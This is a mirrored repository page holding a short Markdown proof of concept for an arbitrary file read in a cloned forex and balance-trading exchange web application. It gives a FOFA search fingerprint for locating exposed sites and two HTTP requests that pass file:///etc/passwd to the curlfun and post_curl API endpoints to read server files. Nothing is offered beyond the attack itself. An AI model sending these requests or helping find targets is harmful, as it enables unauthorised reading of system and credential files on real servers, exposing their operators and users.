admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/交易所系统/仿新浪外汇余额宝时间交易所任意文件读取.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

23 lines
526 B
Markdown
Raw Blame History

## 仿新浪外汇余额宝时间交易所任意文件读取
![image-20240616192357166](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406161923273.png)
## fofa
```
"/static/index/css/ionic.css" && "devework.com"
```
## poc
```
GET /index.php/index/Api/curlfun?url=file:///etc/passwd HTTP/1.1
Host:
```
```
GET /index.php/index/Api/post_curl?url=file:///etc/passwd&data=1 HTTP/1.1
Host:
```
![image-20240616192912529](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406161929587.png)
Reference in New Issue View Git Blame Copy Permalink